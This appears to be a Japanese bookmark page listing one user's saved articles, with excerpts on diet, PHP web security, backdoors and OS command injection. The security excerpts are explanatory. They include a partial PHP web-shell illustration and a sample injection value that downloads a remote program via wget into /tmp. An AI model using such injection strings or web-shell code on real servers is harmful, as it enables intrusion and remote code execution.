タグ

2022年6月20日のブックマーク (9件)

  • 管理栄養士が教える!脂質異常症の食事で気を付けるべきポイント | メディカルケア内科

    1.適正体重を維持するための適切なエネルギー量の摂取 摂りすぎて余ってしまったエネルギーは、肝臓でのコレステロールやトリグリセリド(中性脂肪)に合成されて、血液中の脂質が高くなります。 適正エネルギー量をバランスのとれた事で、3規則正しく摂ることは、肥満を解消し、血中脂質を下げることが出来ます。適正体重が維持できるように、エネルギーの過剰摂取に注意しましょう。 適正体重を維持するためには、標準体重に照らし合わせた適正エネルギー量を摂取する必要があります。 標準体重と適正エネルギー量 肥満度 *BMI(Body Mass Index)=体重(kg)÷身長(m)÷身長(m) BMI⇒18.5未満:低体重 18.5以上25未満:普通体重 25以上:肥満 標準体重 *標準体重 =身長(m)×身長(m)×22 1日の適正エネルギー量 エネルギー量(㎉)=標準体重(㎏)×25~30㎉ 2.脂肪の質

  • 駆け出しエンジニアの皆さんに知ってほしい脆弱性のこと。

    セキュリティは難しいです。 ですが、プログラミング初学者の皆さんは必要以上に萎縮せず、どんどんアプリケーションを作り、公開することにチャレンジして欲しいと私は思っています。 一方、事実として、脆弱なアプリケーションが公開されている(サーバ上でアクセス可能な状態になっている)だけで、全く無関係な第三者が被害を被る可能性があることは知っておく必要があります。 それはWordPressを使った単なるWebサイトであったとしても同じです。 また、あなたのアプリケーションが破壊されて困らないものであったり、 個人情報を保持していないものであったとしても、です。 だから、知らなかった、では済まされないこともあります。 この記事では、PHPのソースを例に、 特にプログラミング初学者が生み出しやすいアプリケーションの脆弱性について、 具体的なコードを挙げながら解説します。 なお、記事のサンプルコードはも

    駆け出しエンジニアの皆さんに知ってほしい脆弱性のこと。
  • バックドアの実例と対応

    はじめに Webサイトのソースが改ざんされて、見れなくなった。 全然違うページが表示されている。 コードを修正してもすぐにまた改ざんされる。 ・・・といったご相談が相次いでおります。 Webサイトの何らかの脆弱性を突かれ、「バックドア」を設置された、というパターンです。 攻撃を受けたサイトのリカバリー対応は、当に神経を使いますし、骨が折れます。 (そして何より生産的ではありません・・・) 折角なので、バックドアに対する理解を深めていただけると嬉しいなと思い、記事を書きました。 バックドアとはこんなもの 皆さん言葉は知っていると思いますが、 「バックドア」とは、ざっくり言うとこんなイメージのファイルです。 (詳細は後述しますが、これはあくまでイメージです。) <?php $path = __DIR__ . '/' . $_POST['path']; $content = $_POST['c

    バックドアの実例と対応
  • OSコマンドのエスケープ – シェルの仕様とコマンドの実装

    (Last Updated On: 2018年8月16日)OSコマンドのエスケープの続きです。OSコマンドインジェクションを防ぐための、OSコマンドのエスケープはSQLのエスケープに比べるとかなり難しいです。 難しくなる理由は多くの不定となる条件に依存する事にあります。 OSコマンドを実行するシェルはシステムによって異なる シェルはプログラミング言語+複雑なエスケープ仕様を持っている(コマンド以後はクオートなしでも文字リテラルのパラメーター+各種展開処理) WebアプリはCGIインターフェースで動作するため環境変数にインジェクションできる コマンドパラメーターの取り扱いはコマンド次第である 実行されるコマンドの実装により、間接インジェクションが可能になる SQLの場合、出力先のシステムは一定です。PostgreSQL用にエスケープした文字列をMySQLで実行したり、MySQL用にエスケープ

    OSコマンドのエスケープ – シェルの仕様とコマンドの実装
  • OSコマンドのエスケープ

    (Last Updated On: 2022年7月25日)プログラムからOSコマンドを実行する場合、エスケープ処理を行わないと任意コマンドが実行される危険性があります。 今回はOSコマンドのエスケープについてです。 OSコマンドインジェクション OSコマンドインジェクションはプログラムから実行するコマンドに、攻撃用文字列を挿入(インジェクション)して意図しないコマンドを実行させる攻撃です。 例えば、次のようなLinuxシステムのディレクトリの内容を表示させるプログラム <?php passthru('ls -l '.$_GET['dir']); (任意のディレクトリ内容を表示できる脆弱性はここでは考慮しない) に不正なコマンドを実行させるのはとても簡単です。$_GET[‘dir’]に . ; cd /tmp; wget http://example.com/evil_program; ch

    OSコマンドのエスケープ
  • My Moblog

  • 4-2. Perl の危険な関数

    <body> </body>

  • スレッドフロート型掲示板スクリプト(PHP・UTF-8・スマホ対応) | 煤式自動連結器

    スレッドフロート型掲示板スクリプト(PHPUTF-8・スマホ対応) 2021年10月18日 12時00分  月齢:12.0[十三夜] 潮汐:中潮 (最終更新日:2024年03月10日) 2年前に投稿 | ウェブ・IT関係 | コメントはありません 3分ぐらいで読めます。 2ちゃんねる(現5ちゃんねる)タイプのスレッドフロート型(あめぞう型)掲示板PHPスクリプトです。 昔は「ぜろちゃんねるスクリプト」など他にもいろいろあったんですけどね…いつのまにかほとんど見かけなくなってしまいました。「ぜろちゃんねるプラス」、「ぜろちゃんねるスクリプト倉庫(ミラー)」があるみたい。他にはCGI工房の「スレッドフロート式マルチ掲示板」とか。なんかめっちゃ多機能なんですけど。Perl派の人はぜひ試してみてネ。(ただ使うだけならPerlでいいんだケド、改造しようと思ったらPHPしか触れない…) さてさて、今

    スレッドフロート型掲示板スクリプト(PHP・UTF-8・スマホ対応) | 煤式自動連結器
  • PHPで表示中のURL情報を取得する:$_SERVER

    PHPで現在表示しているページのアドレスを取得する方法について説明します。 URLを$_SERVER変数から取得する 表示中のURLの情報は$_SERVERに格納され、$_SERVERを参照することで様々な情報を取得できることができます。 対象ページが http://uxmilk.jp/14769 の場合、以下のようになります。 アクセスしているページを取得 現在アクセスしているページを表示します。

    satopian
    satopian 2022/06/20
    “$_SERVER["HTTPS"]) ? "http://" : "https://"”